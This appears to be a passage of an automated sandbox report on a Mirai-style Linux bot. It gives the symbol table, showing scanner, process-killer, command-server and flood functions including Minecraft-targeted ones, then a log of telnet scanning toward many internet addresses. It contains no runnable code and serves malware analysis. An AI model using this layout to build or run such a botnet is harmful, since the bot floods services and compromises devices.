killer_kill_by_port	.symtab	0x4002a0	1372	FUNC	<unknown>	DEFAULT	2
killer_pid	.symtab	0x51a9a0	4	OBJECT	<unknown>	DEFAULT	10
killer_realpath	.symtab	0x51a998	8	OBJECT	<unknown>	DEFAULT	10
killer_realpath_len	.symtab	0x5185d0	4	OBJECT	<unknown>	DEFAULT	10
lengthd.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
lengthq.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/x86_64/memcpy.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/x86_64/mempcpy.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/x86_64/memset.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/x86_64/strchr.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/x86_64/strcmp.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/x86_64/strcpy.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/x86_64/strcspn.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/x86_64/strlen.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/x86_64/strpbrk.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/string/x86_64/strspn.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/x86_64/crt1.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/x86_64/crti.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/x86_64/crtn.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc/sysdeps/linux/x86_64/vfork.S	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
listFork	.symtab	0x401040	5	FUNC	<unknown>	DEFAULT	2
listen	.symtab	0x40be00	44	FUNC	<unknown>	DEFAULT	2
listen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
llseek.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
lseek	.symtab	0x40e4e4	45	FUNC	<unknown>	DEFAULT	2
lseek.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
lseek64	.symtab	0x40e4dc	5	FUNC	<unknown>	DEFAULT	2
main	.symtab	0x402390	1595	FUNC	<unknown>	DEFAULT	2
main.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
malloc	.symtab	0x40c0a8	2149	FUNC	<unknown>	DEFAULT	2
malloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
malloc_trim	.symtab	0x40d15b	28	FUNC	<unknown>	DEFAULT	2
max	.symtab	0x5185e0	4	OBJECT	<unknown>	DEFAULT	10
memchr	.symtab	0x40f538	240	FUNC	<unknown>	DEFAULT	2
memchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
memcpy	.symtab	0x40ac10	102	FUNC	<unknown>	DEFAULT	2
memmove	.symtab	0x40aec4	734	FUNC	<unknown>	DEFAULT	2
memmove.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mempcpy	.symtab	0x40f250	90	FUNC	<unknown>	DEFAULT	2
memrchr	.symtab	0x40f628	237	FUNC	<unknown>	DEFAULT	2
memrchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
memset	.symtab	0x40ac80	210	FUNC	<unknown>	DEFAULT	2
mmap	.symtab	0x40e194	48	FUNC	<unknown>	DEFAULT	2
mmap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mozie.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mremap	.symtab	0x40e514	42	FUNC	<unknown>	DEFAULT	2
mremap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
munmap	.symtab	0x40e540	38	FUNC	<unknown>	DEFAULT	2
munmap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mylock	.symtab	0x5183a0	40	OBJECT	<unknown>	DEFAULT	9
mylock	.symtab	0x5183e0	40	OBJECT	<unknown>	DEFAULT	9
mylock	.symtab	0x51a960	40	OBJECT	<unknown>	DEFAULT	10
nanosleep	.symtab	0x40e568	38	FUNC	<unknown>	DEFAULT	2
nanosleep.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
next_start.1440	.symtab	0x51a6c0	8	OBJECT	<unknown>	DEFAULT	10
ntop.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
object.2814	.symtab	0x5185a0	48	OBJECT	<unknown>	DEFAULT	10
open	.symtab	0x409514	106	FUNC	<unknown>	DEFAULT	2
open.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
opendir	.symtab	0x4097a4	243	FUNC	<unknown>	DEFAULT	2
opendir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
opennameservers.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
p.2759	.symtab	0x518048	0	OBJECT	<unknown>	DEFAULT	9
pending_connection	.symtab	0x5185d4	1	OBJECT	<unknown>	DEFAULT	10
poll	.symtab	0x4102c8	41	FUNC	<unknown>	DEFAULT	2
poll.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
prctl	.symtab	0x40958c	44	FUNC	<unknown>	DEFAULT	2
prctl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
prefix.4494	.symtab	0x416475	12	OBJECT	<unknown>	DEFAULT	4
printf	.symtab	0x409960	157	FUNC	<unknown>	DEFAULT	2
printf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
qual_chars.4498	.symtab	0x416490	20	OBJECT	<unknown>	DEFAULT	4
raise	.symtab	0x410258	18	FUNC	<unknown>	DEFAULT	2
raise.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand	.symtab	0x40d28c	11	FUNC	<unknown>	DEFAULT	2
rand.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand_alphastr	.symtab	0x405f30	311	FUNC	<unknown>	DEFAULT	2
rand_init	.symtab	0x405ef0	59	FUNC	<unknown>	DEFAULT	2
rand_next	.symtab	0x405ea0	72	FUNC	<unknown>	DEFAULT	2
rand_str	.symtab	0x406070	218	FUNC	<unknown>	DEFAULT	2
random	.symtab	0x40d298	72	FUNC	<unknown>	DEFAULT	2
random.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
random_poly_info	.symtab	0x417120	40	OBJECT	<unknown>	DEFAULT	4
random_r	.symtab	0x40d4a0	90	FUNC	<unknown>	DEFAULT	2
random_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
randtbl	.symtab	0x518460	128	OBJECT	<unknown>	DEFAULT	9
rawmemchr	.symtab	0x410c00	190	FUNC	<unknown>	DEFAULT	2
rawmemchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
read	.symtab	0x4095b8	39	FUNC	<unknown>	DEFAULT	2
read.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
read_etc_hosts_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
readdir	.symtab	0x409898	143	FUNC	<unknown>	DEFAULT	2
readdir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
readlink	.symtab	0x4095e0	39	FUNC	<unknown>	DEFAULT	2
readlink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
realloc	.symtab	0x40ca08	857	FUNC	<unknown>	DEFAULT	2
realloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
recv	.symtab	0x40be2c	11	FUNC	<unknown>	DEFAULT	2
recv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
recv_strip_null	.symtab	0x406810	52	FUNC	<unknown>	DEFAULT	2
recvfrom	.symtab	0x40be38	45	FUNC	<unknown>	DEFAULT	2
recvfrom.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
resolv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
resolv_domain_to_hostname	.symtab	0x406180	100	FUNC	<unknown>	DEFAULT	2
resolv_entries_free	.symtab	0x406150	34	FUNC	<unknown>	DEFAULT	2
resolv_lookup	.symtab	0x4061f0	1352	FUNC	<unknown>	DEFAULT	2
resolve_cnc_addr	.symtab	0x401050	151	FUNC	<unknown>	DEFAULT	2
resolve_func	.symtab	0x518060	8	OBJECT	<unknown>	DEFAULT	9
rsck	.symtab	0x51aa00	4	OBJECT	<unknown>	DEFAULT	10
rsck_out	.symtab	0x51aa0c	4	OBJECT	<unknown>	DEFAULT	10
sbrk	.symtab	0x40e590	74	FUNC	<unknown>	DEFAULT	2
sbrk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
scanner.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
scanner10_pid	.symtab	0x51a9c4	4	OBJECT	<unknown>	DEFAULT	10
scanner11_pid	.symtab	0x51a9c8	4	OBJECT	<unknown>	DEFAULT	10
scanner12_pid	.symtab	0x51a9cc	4	OBJECT	<unknown>	DEFAULT	10
scanner13_pid	.symtab	0x51a9d8	4	OBJECT	<unknown>	DEFAULT	10
scanner2_pid	.symtab	0x51a9e8	4	OBJECT	<unknown>	DEFAULT	10
scanner3_pid	.symtab	0x51a9c0	4	OBJECT	<unknown>	DEFAULT	10
scanner4_pid	.symtab	0x51a9d0	4	OBJECT	<unknown>	DEFAULT	10
scanner5_pid	.symtab	0x51a9f0	4	OBJECT	<unknown>	DEFAULT	10
scanner6_pid	.symtab	0x51a9e0	4	OBJECT	<unknown>	DEFAULT	10
scanner7_pid	.symtab	0x51a9d4	4	OBJECT	<unknown>	DEFAULT	10
scanner8_pid	.symtab	0x51a9ec	4	OBJECT	<unknown>	DEFAULT	10
scanner9_pid	.symtab	0x51a9dc	4	OBJECT	<unknown>	DEFAULT	10
scanner_init	.symtab	0x406a10	6447	FUNC	<unknown>	DEFAULT	2
scanner_kill	.symtab	0x406740	16	FUNC	<unknown>	DEFAULT	2
scanner_pid	.symtab	0x51aa08	4	OBJECT	<unknown>	DEFAULT	10
scanner_rawpkt	.symtab	0x518660	40	OBJECT	<unknown>	DEFAULT	10
select	.symtab	0x409608	44	FUNC	<unknown>	DEFAULT	2
select.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
send	.symtab	0x40be68	11	FUNC	<unknown>	DEFAULT	2
send.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sendBukkitJoin	.symtab	0x401ae0	714	FUNC	<unknown>	DEFAULT	2
sendHTTPGET	.symtab	0x402180	313	FUNC	<unknown>	DEFAULT	2
sendJoin	.symtab	0x401db0	756	FUNC	<unknown>	DEFAULT	2
sendMotd	.symtab	0x4015a0	356	FUNC	<unknown>	DEFAULT	2
sendNullping	.symtab	0x4019b0	298	FUNC	<unknown>	DEFAULT	2
sendRandomBytes	.symtab	0x401310	641	FUNC	<unknown>	DEFAULT	2
sendRandomName	.symtab	0x401710	670	FUNC	<unknown>	DEFAULT	2
sendTCP	.symtab	0x4022c0	206	FUNC	<unknown>	DEFAULT	2
sendUDP	.symtab	0x4020b0	196	FUNC	<unknown>	DEFAULT	2
sendto	.symtab	0x40be74	48	FUNC	<unknown>	DEFAULT	2
sendto.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setsid	.symtab	0x409634	38	FUNC	<unknown>	DEFAULT	2
setsid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setsockopt	.symtab	0x40bea4	53	FUNC	<unknown>	DEFAULT	2
setsockopt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setstate	.symtab	0x40d2e0	98	FUNC	<unknown>	DEFAULT	2
setstate_r	.symtab	0x40d3f8	168	FUNC	<unknown>	DEFAULT	2
setup_connection	.symtab	0x406750	179	FUNC	<unknown>	DEFAULT	2
sigaction	.symtab	0x40e09d	247	FUNC	<unknown>	DEFAULT	2
sigaction.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigaddset	.symtab	0x40bf0c	35	FUNC	<unknown>	DEFAULT	2
sigaddset.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigempty.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigemptyset	.symtab	0x40bf30	20	FUNC	<unknown>	DEFAULT	2
signal	.symtab	0x40bf44	168	FUNC	<unknown>	DEFAULT	2
signal.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigprocmask	.symtab	0x40965c	85	FUNC	<unknown>	DEFAULT	2
sigprocmask.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigsetops.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sleep	.symtab	0x40dab4	415	FUNC	<unknown>	DEFAULT	2
sleep.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
snprintf	.symtab	0x409a00	137	FUNC	<unknown>	DEFAULT	2
snprintf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
socket	.symtab	0x40bedc	47	FUNC	<unknown>	DEFAULT	2
socket.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
socket_connect_tcp	.symtab	0x4029f0	171	FUNC	<unknown>	DEFAULT	2
socket_connect_udp	.symtab	0x4029d0	2	FUNC	<unknown>	DEFAULT	2
spec_and_mask.4497	.symtab	0x4164b0	16	OBJECT	<unknown>	DEFAULT	4
spec_base.4493	.symtab	0x416481	7	OBJECT	<unknown>	DEFAULT	4
spec_chars.4494	.symtab	0x4164e0	21	OBJECT	<unknown>	DEFAULT	4
spec_flags.4493	.symtab	0x4164f5	8	OBJECT	<unknown>	DEFAULT	4
spec_or_mask.4496	.symtab	0x4164c0	16	OBJECT	<unknown>	DEFAULT	4
spec_ranges.4495	.symtab	0x4164d0	9	OBJECT	<unknown>	DEFAULT	4
sprintf	.symtab	0x409a8c	149	FUNC	<unknown>	DEFAULT	2
sprintf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
srand	.symtab	0x40d3b0	72	FUNC	<unknown>	DEFAULT	2
srandom	.symtab	0x40d3b0	72	FUNC	<unknown>	DEFAULT	2
srandom_r	.symtab	0x40d4fa	169	FUNC	<unknown>	DEFAULT	2
srv_addr	.symtab	0x51a9b0	16	OBJECT	<unknown>	DEFAULT	10
static_id	.symtab	0x518530	2	OBJECT	<unknown>	DEFAULT	9
static_ns	.symtab	0x51a988	4	OBJECT	<unknown>	DEFAULT	10
stderr	.symtab	0x518130	8	OBJECT	<unknown>	DEFAULT	9
stdin	.symtab	0x518120	8	OBJECT	<unknown>	DEFAULT	9
stdout	.symtab	0x518128	8	OBJECT	<unknown>	DEFAULT	9
strcasecmp	.symtab	0x411474	48	FUNC	<unknown>	DEFAULT	2
strcasecmp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strchr	.symtab	0x40f2b0	417	FUNC	<unknown>	DEFAULT	2
strcmp	.symtab	0x410ac0	33	FUNC	<unknown>	DEFAULT	2
strcoll	.symtab	0x410ac0	33	FUNC	<unknown>	DEFAULT	2
strcpy	.symtab	0x40f460	213	FUNC	<unknown>	DEFAULT	2
strcspn	.symtab	0x40ad58	135	FUNC	<unknown>	DEFAULT	2
strdup	.symtab	0x410d38	54	FUNC	<unknown>	DEFAULT	2
strdup.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strerror_r	.symtab	0x40b284	194	FUNC	<unknown>	DEFAULT	2
strlen	.symtab	0x40ade0	225	FUNC	<unknown>	DEFAULT	2
strncat	.symtab	0x410cc0	119	FUNC	<unknown>	DEFAULT	2
strncat.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strncpy	.symtab	0x40f718	131	FUNC	<unknown>	DEFAULT	2
strncpy.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strnlen	.symtab	0x40b1a4	206	FUNC	<unknown>	DEFAULT	2
strnlen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strpbrk	.symtab	0x410ae8	140	FUNC	<unknown>	DEFAULT	2
strspn	.symtab	0x410b78	135	FUNC	<unknown>	DEFAULT	2
strtoimax	.symtab	0x40d7c0	10	FUNC	<unknown>	DEFAULT	2
strtok	.symtab	0x40b358	10	FUNC	<unknown>	DEFAULT	2
strtok.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtok_r	.symtab	0x40f79c	94	FUNC	<unknown>	DEFAULT	2
strtok_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtol	.symtab	0x40d7c0	10	FUNC	<unknown>	DEFAULT	2
strtol.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtoll	.symtab	0x40d7c0	10	FUNC	<unknown>	DEFAULT	2
substring	.symtab	0x401000	45	FUNC	<unknown>	DEFAULT	2
sysconf	.symtab	0x40dc54	351	FUNC	<unknown>	DEFAULT	2
sysconf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
system	.symtab	0x40d65c	335	FUNC	<unknown>	DEFAULT	2
system.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
table	.symtab	0x51aa20	832	OBJECT	<unknown>	DEFAULT	10
table.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
table_init	.symtab	0x408450	2353	FUNC	<unknown>	DEFAULT	2
table_key	.symtab	0x518114	4	OBJECT	<unknown>	DEFAULT	9
table_lock_val	.symtab	0x408370	104	FUNC	<unknown>	DEFAULT	2
table_retrieve_val	.symtab	0x408340	33	FUNC	<unknown>	DEFAULT	2
table_unlock_val	.symtab	0x4083e0	104	FUNC	<unknown>	DEFAULT	2
tcgetattr	.symtab	0x40b380	110	FUNC	<unknown>	DEFAULT	2
tcgetattr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
time	.symtab	0x4096b4	39	FUNC	<unknown>	DEFAULT	2
time.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
timeout	.symtab	0x518110	4	OBJECT	<unknown>	DEFAULT	9
times	.symtab	0x40e5dc	39	FUNC	<unknown>	DEFAULT	2
times.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
tolower	.symtab	0x40e78c	30	FUNC	<unknown>	DEFAULT	2
tolower.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
type_codes	.symtab	0x416500	24	OBJECT	<unknown>	DEFAULT	4
type_sizes	.symtab	0x416518	12	OBJECT	<unknown>	DEFAULT	4
unknown.2050	.symtab	0x416568	14	OBJECT	<unknown>	DEFAULT	4
unlink	.symtab	0x4096dc	38	FUNC	<unknown>	DEFAULT	2
unlink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
unsafe_state	.symtab	0x518420	48	OBJECT	<unknown>	DEFAULT	9
usleep	.symtab	0x40ddb4	52	FUNC	<unknown>	DEFAULT	2
usleep.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
util.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
util_atoi	.symtab	0x408e90	326	FUNC	<unknown>	DEFAULT	2
util_fdgets	.symtab	0x408fe0	137	FUNC	<unknown>	DEFAULT	2
util_itoa	.symtab	0x409270	218	FUNC	<unknown>	DEFAULT	2
util_local_addr	.symtab	0x409070	120	FUNC	<unknown>	DEFAULT	2
util_memcpy	.symtab	0x408e00	25	FUNC	<unknown>	DEFAULT	2
util_memsearch	.symtab	0x408e40	71	FUNC	<unknown>	DEFAULT	2
util_strcmp	.symtab	0x409180	98	FUNC	<unknown>	DEFAULT	2
util_strcpy	.symtab	0x408dc0	59	FUNC	<unknown>	DEFAULT	2
util_stristr	.symtab	0x4090f0	132	FUNC	<unknown>	DEFAULT	2
util_strlen	.symtab	0x408d90	33	FUNC	<unknown>	DEFAULT	2
util_strncmp	.symtab	0x4091f0	113	FUNC	<unknown>	DEFAULT	2
util_zero	.symtab	0x408e20	20	FUNC	<unknown>	DEFAULT	2
vfork	.symtab	0x40e1c4	21	FUNC	<unknown>	DEFAULT	2
vfprintf	.symtab	0x409d18	143	FUNC	<unknown>	DEFAULT	2
vfprintf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
vsnprintf	.symtab	0x409b24	199	FUNC	<unknown>	DEFAULT	2
vsnprintf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
w	.symtab	0x518634	4	OBJECT	<unknown>	DEFAULT	10
wait4	.symtab	0x40e604	47	FUNC	<unknown>	DEFAULT	2
wait4.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcrtomb	.symtab	0x40e7b4	68	FUNC	<unknown>	DEFAULT	2
wcrtomb.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcsnrtombs	.symtab	0x40e808	140	FUNC	<unknown>	DEFAULT	2
wcsnrtombs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcsrtombs	.symtab	0x40e7f8	15	FUNC	<unknown>	DEFAULT	2
wcsrtombs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
write	.symtab	0x409704	42	FUNC	<unknown>	DEFAULT	2
write.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
x	.symtab	0x518628	4	OBJECT	<unknown>	DEFAULT	10
xdigits.3747	.symtab	0x417100	17	OBJECT	<unknown>	DEFAULT	4
xstatconv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
y	.symtab	0x51862c	4	OBJECT	<unknown>	DEFAULT	10
z	.symtab	0x518630	4	OBJECT	<unknown>	DEFAULT	10

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 16:27:45.264082909 CET	15661	2323	192.168.2.20	163.151.162.85
Nov 29, 2022 16:27:45.264296055 CET	15661	23	192.168.2.20	83.190.241.252
Nov 29, 2022 16:27:45.264297962 CET	15661	23	192.168.2.20	20.19.233.226
Nov 29, 2022 16:27:45.264297962 CET	15661	23	192.168.2.20	45.81.142.31
Nov 29, 2022 16:27:45.264358997 CET	15661	23	192.168.2.20	86.8.87.39
Nov 29, 2022 16:27:45.264543056 CET	15661	23	192.168.2.20	167.5.212.208
Nov 29, 2022 16:27:45.264556885 CET	15661	23	192.168.2.20	82.130.119.117
Nov 29, 2022 16:27:45.264575958 CET	15661	23	192.168.2.20	54.213.36.74
Nov 29, 2022 16:27:45.264585018 CET	15661	23	192.168.2.20	95.60.53.181
Nov 29, 2022 16:27:45.264585018 CET	15661	2323	192.168.2.20	104.142.173.149
Nov 29, 2022 16:27:45.264585018 CET	15661	23	192.168.2.20	88.61.106.82
Nov 29, 2022 16:27:45.264591932 CET	15661	23	192.168.2.20	27.153.74.237
Nov 29, 2022 16:27:45.264609098 CET	15661	23	192.168.2.20	196.140.221.108
Nov 29, 2022 16:27:45.264616013 CET	15661	23	192.168.2.20	17.50.61.226
Nov 29, 2022 16:27:45.264621973 CET	15661	23	192.168.2.20	180.180.89.207
Nov 29, 2022 16:27:45.264806986 CET	15661	23	192.168.2.20	206.35.61.39
Nov 29, 2022 16:27:45.264997959 CET	15661	23	192.168.2.20	223.167.249.150
Nov 29, 2022 16:27:45.264997959 CET	15661	23	192.168.2.20	44.14.123.140
Nov 29, 2022 16:27:45.264997959 CET	15661	23	192.168.2.20	202.48.66.143
Nov 29, 2022 16:27:45.265018940 CET	15661	23	192.168.2.20	188.159.123.206
Nov 29, 2022 16:27:45.265024900 CET	15661	2323	192.168.2.20	209.184.177.135
Nov 29, 2022 16:27:45.265024900 CET	15661	23	192.168.2.20	60.220.164.58
Nov 29, 2022 16:27:45.265028954 CET	15661	23	192.168.2.20	122.6.32.167
Nov 29, 2022 16:27:45.265053988 CET	15661	23	192.168.2.20	46.21.99.14
Nov 29, 2022 16:27:45.265527964 CET	15661	23	192.168.2.20	147.27.52.221
Nov 29, 2022 16:27:45.265546083 CET	15661	23	192.168.2.20	76.245.236.136
Nov 29, 2022 16:27:45.265563965 CET	15661	23	192.168.2.20	150.104.214.104
Nov 29, 2022 16:27:45.265592098 CET	15661	23	192.168.2.20	160.9.111.142
Nov 29, 2022 16:27:45.265593052 CET	15661	23	192.168.2.20	147.71.201.65
Nov 29, 2022 16:27:45.265594006 CET	15661	2323	192.168.2.20	137.243.81.5
Nov 29, 2022 16:27:45.265600920 CET	15661	23	192.168.2.20	219.172.207.151
Nov 29, 2022 16:27:45.265600920 CET	15661	23	192.168.2.20	121.113.44.14
Nov 29, 2022 16:27:45.265607119 CET	15661	23	192.168.2.20	13.96.107.89
Nov 29, 2022 16:27:45.265788078 CET	15661	23	192.168.2.20	213.89.225.108
Nov 29, 2022 16:27:45.265794039 CET	15661	23	192.168.2.20	193.185.85.99
Nov 29, 2022 16:27:45.265805960 CET	15661	23	192.168.2.20	66.68.113.85
Nov 29, 2022 16:27:45.265814066 CET	15661	23	192.168.2.20	11.186.151.230
Nov 29, 2022 16:27:45.265830040 CET	15661	23	192.168.2.20	104.103.254.113
Nov 29, 2022 16:27:45.265846968 CET	15661	23	192.168.2.20	91.80.118.85
Nov 29, 2022 16:27:45.265851974 CET	15661	23	192.168.2.20	194.34.99.79
Nov 29, 2022 16:27:45.265851974 CET	15661	2323	192.168.2.20	2.206.168.216
Nov 29, 2022 16:27:45.265861034 CET	15661	23	192.168.2.20	167.10.69.106
Nov 29, 2022 16:27:45.266073942 CET	15661	23	192.168.2.20	67.26.77.133
Nov 29, 2022 16:27:45.266093016 CET	15661	23	192.168.2.20	95.62.219.106
Nov 29, 2022 16:27:45.266104937 CET	15661	23	192.168.2.20	90.208.83.53
Nov 29, 2022 16:27:45.266114950 CET	15661	23	192.168.2.20	33.201.138.99
Nov 29, 2022 16:27:45.266129017 CET	15661	23	192.168.2.20	188.218.71.100
Nov 29, 2022 16:27:45.266134977 CET	15661	23	192.168.2.20	39.27.47.6
Nov 29, 2022 16:27:45.266777992 CET	15661	23	192.168.2.20	89.138.240.83
Nov 29, 2022 16:27:45.266817093 CET	15661	2323	192.168.2.20	19.135.140.179
Nov 29, 2022 16:27:45.266834021 CET	15661	23	192.168.2.20	125.194.52.215
Nov 29, 2022 16:27:45.266834021 CET	15661	23	192.168.2.20	209.151.24.62
Nov 29, 2022 16:27:45.266916990 CET	15661	23	192.168.2.20	132.74.172.192
Nov 29, 2022 16:27:45.266916990 CET	15661	23	192.168.2.20	165.244.38.11
Nov 29, 2022 16:27:45.267046928 CET	15661	23	192.168.2.20	2.243.179.168
Nov 29, 2022 16:27:45.267046928 CET	15661	23	192.168.2.20	16.98.175.232
Nov 29, 2022 16:27:45.267137051 CET	15661	23	192.168.2.20	102.65.8.106
Nov 29, 2022 16:27:45.267138958 CET	15661	23	192.168.2.20	120.206.169.201
Nov 29, 2022 16:27:45.267195940 CET	15661	2323	192.168.2.20	197.239.84.85
Nov 29, 2022 16:27:45.267196894 CET	15661	23	192.168.2.20	36.250.43.134
Nov 29, 2022 16:27:45.267199039 CET	15661	23	192.168.2.20	12.53.44.177
Nov 29, 2022 16:27:45.267199993 CET	15661	23	192.168.2.20	42.209.60.171
Nov 29, 2022 16:27:45.267199993 CET	15661	23	192.168.2.20	59.166.174.33
Nov 29, 2022 16:27:45.267203093 CET	15661	23	192.168.2.20	103.183.140.115
Nov 29, 2022 16:27:45.267208099 CET	15661	23	192.168.2.20	83.131.63.191
Nov 29, 2022 16:27:45.267209053 CET	15661	23	192.168.2.20	154.228.227.62
Nov 29, 2022 16:27:45.267219067 CET	15661	23	192.168.2.20	81.22.165.36
Nov 29, 2022 16:27:45.267225027 CET	15661	23	192.168.2.20	223.142.69.204
Nov 29, 2022 16:27:45.267810106 CET	15661	23	192.168.2.20	156.104.154.166
Nov 29, 2022 16:27:45.267813921 CET	15661	23	192.168.2.20	151.100.194.4
Nov 29, 2022 16:27:45.267818928 CET	15661	2323	192.168.2.20	200.92.245.153
Nov 29, 2022 16:27:45.267854929 CET	15661	23	192.168.2.20	176.16.45.44
Nov 29, 2022 16:27:45.267862082 CET	15661	23	192.168.2.20	190.60.137.214
Nov 29, 2022 16:27:45.267860889 CET	15661	23	192.168.2.20	82.222.227.185
Nov 29, 2022 16:27:45.267877102 CET	15661	23	192.168.2.20	160.77.218.188
Nov 29, 2022 16:27:45.268867970 CET	15661	23	192.168.2.20	53.245.99.125
Nov 29, 2022 16:27:45.268882036 CET	15661	23	192.168.2.20	209.216.24.196
Nov 29, 2022 16:27:45.268906116 CET	15661	23	192.168.2.20	119.29.213.41
Nov 29, 2022 16:27:45.268913031 CET	15661	23	192.168.2.20	117.85.209.244
Nov 29, 2022 16:27:45.268929005 CET	15661	23	192.168.2.20	45.130.85.127
